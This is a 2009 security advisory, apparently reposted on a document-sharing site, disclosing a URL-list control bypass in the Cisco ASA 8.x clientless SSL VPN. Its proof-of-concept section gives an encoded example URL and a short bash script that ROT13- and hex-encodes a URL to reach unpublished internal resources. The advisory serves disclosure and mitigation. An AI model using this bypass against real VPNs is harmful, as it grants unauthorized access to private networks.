Docstoc

Cisco ASA 8.x VPN SSL module Clientless URLlist control bypass

Document Sample
Cisco ASA 8.x VPN SSL module Clientless URLlist control bypass Powered By Docstoc
					                   Cisco ASA 8.x VPN SSL module Clientless URLlist control bypass   Page 1/2
  1    =============================================
  2    INTERNET SECURITY AUDITORS ALERT 2009−013
  3    − Original release date: December 7th, 2009
  4    − Last revised: December 16th, 2009
  5    − Discovered by: David Eduardo Acosta Rodriguez
  6    − Severity: 4/10 (CVSS Base Score)
  7    =============================================
  8
  9    I. VULNERABILITY
  10   −−−−−−−−−−−−−−−−−−−−−−−−−
  11   Cisco ASA <= 8.x VPN SSL module Clientless URL−list control bypass
  12
  13   II. BACKGROUND
  14   −−−−−−−−−−−−−−−−−−−−−−−−−
  15   Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
  16   Services Routers to extend network resources to virtually any remote
  17   user with access to the Internet and a web browser.
  18
  19   III. DESCRIPTION
  20   −−−−−−−−−−−−−−−−−−−−−−−−−
  21   Cisco VPN SSL Clientless lets administrators define rules to specific
  22   targets within the private network that WebVPN users will be able to
  23   access. This specific targets are published using links in VPN SSL
  24   home page. These links (URL) are protected (obfuscated) using a ROT13
  25   substitution[2] and converting ASCII characters to hexadecimal. An
  26   user with a valid account and without "URL entry" can access any
  27   internal/external resource simply taken an URL, encrypt with ROT 13,
  28   convert ASCII characters to hexadecimal and appending this string to
  29   Cisco VPN SSL URL.
  30
  31   IV. PROOF OF CONCEPT
  32   −−−−−−−−−−−−−−−−−−−−−−−−−
  33   Using URL http://intranet published on internal server (not accessible
  34   from home page):
  35   1. Convert string to ROT13: uggc://vagenarg
  36   2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
  37   3. Append string to Cisco VPN SSL:
  38   https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++
  39
  40   This is a simple PoC for easy demonstration:
  41
  42   #!/bin/bash
  43   echo −n "write URL:"
  44   read a
  45   b=‘echo −n $a | tr ’[a−m][n−z][A−M][N−Z]’ ’[n−z][a−m][N−Z][A−M]’ | od
  46   −tx1 | cut −c8− | sed ’s/ //g’‘ | paste −s −d ’’;
  47   echo −n "URL "
  48   echo −n "https://[CISCOVPNSSL]/+CSCO+00";; echo −n $b; echo −n "++";
  49   echo "";
  50
  51   V. BUSINESS IMPACT
  52   −−−−−−−−−−−−−−−−−−−−−−−−−
David Eduardo Acosta Rodriguez                                                      12/17/2009
                    Cisco ASA 8.x VPN SSL module Clientless URLlist control bypass   Page 2/2
  53    Users with valid account can surf to internal/external resources,
  54    bypassing controls in home page.
  55
  56    VI. SYSTEMS AFFECTED
  57    −−−−−−−−−−−−−−−−−−−−−−−−−
  58    Cisco ASA <= 8.x are vulnerable.
  59
  60    VII. SOLUTION
  61    −−−−−−−−−−−−−−−−−−−−−−−−−
  62    Always set "webtype" ACL and "filter" to block access in Web VPN SSL
  63    (not activated by default). Included in Cisco site now.
  64    Follow recommendations from "Cisco Understanding Features Not
  65    Supported in Clientless SSL VPN" [3].
  66
  67    VIII. REFERENCES
  68    −−−−−−−−−−−−−−−−−−−−−−−−−
  69    [1] www.cisco.com/web/go/sslvpn
  70    [2] http://en.wikipedia.org/wiki/ROT13
  71    [3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/
  72    guide/webvpn.html#wp999589
  73    http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
  74    http://www.isecauditors.com
  75
  76    IX. CREDITS
  77    −−−−−−−−−−−−−−−−−−−−−−−−−
  78    This vulnerability has been discovered by
  79    David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
  80                                    dacosta (at) computer (dot) org).
  81    Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com))
  82    for additional research.
  83
  84    X. REVISION HISTORY
  85    −−−−−−−−−−−−−−−−−−−−−−−−−
  86    December   7, 2009: Initial release.
  87    December 16, 2009: Last revision.
  88
  89    XI. DISCLOSURE TIMELINE
  90    −−−−−−−−−−−−−−−−−−−−−−−−−
  91    December   9, 2009: Vendor contacted
  92    December   9, 2009: Vendor response, they include our mitigation
  93                        proposal in their website and start the analysis
  94                        of correction required.
  95    December 16, 2009: Vendor confirms remediation and public statement.
  96    December 17, 2009: Sent to lists.
  97
  98    XII. LEGAL NOTICES
  99    −−−−−−−−−−−−−−−−−−−−−−−−−
  100   The information contained within this advisory is supplied "as−is"
  101   with no warranties or guarantees of fitness of use or otherwise.
  102   Internet Security Auditors accepts no responsibility for any damage
  103   caused by the use or misuse of this information.

David Eduardo Acosta Rodriguez                                                       12/17/2009

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:128
posted:5/23/2010
language:English
pages:2